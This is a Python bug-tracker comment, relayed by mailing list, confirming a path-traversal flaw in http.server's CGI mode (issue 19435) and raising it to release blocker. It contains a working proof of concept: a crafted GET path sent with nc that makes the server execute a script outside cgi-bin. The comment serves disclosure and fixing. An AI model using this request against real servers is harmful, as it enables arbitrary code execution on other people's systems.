Christian Heimes added the comment:

I can confirm the issue:

$ mkdir www
$ cd www
$ cat << EOF > badscript.sh
#!/bin/sh
echo hacked
EOF
$ chmod +x badscript.sh
$ ../python -m http.server --cgi


$ echo "GET ///////////badscript.sh/../cgi-bin/cgi.sh HTTP/1.1" | nc localhost 
8000
HTTP/1.0 200 Script output follows
Server: SimpleHTTP/0.6 Python/3.4.0a4+
Date: Tue, 29 Oct 2013 16:47:22 GMT
hacked

----------
assignee:  -> christian.heimes
nosy: +benjamin.peterson, georg.brandl, larry
priority: normal -> release blocker
stage:  -> test needed
versions: +Python 2.7, Python 3.3, Python 3.4

_______________________________________
Python tracker <rep...@bugs.python.org>
<http://bugs.python.org/issue19435>
_______________________________________
_______________________________________________
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com

Reply via email to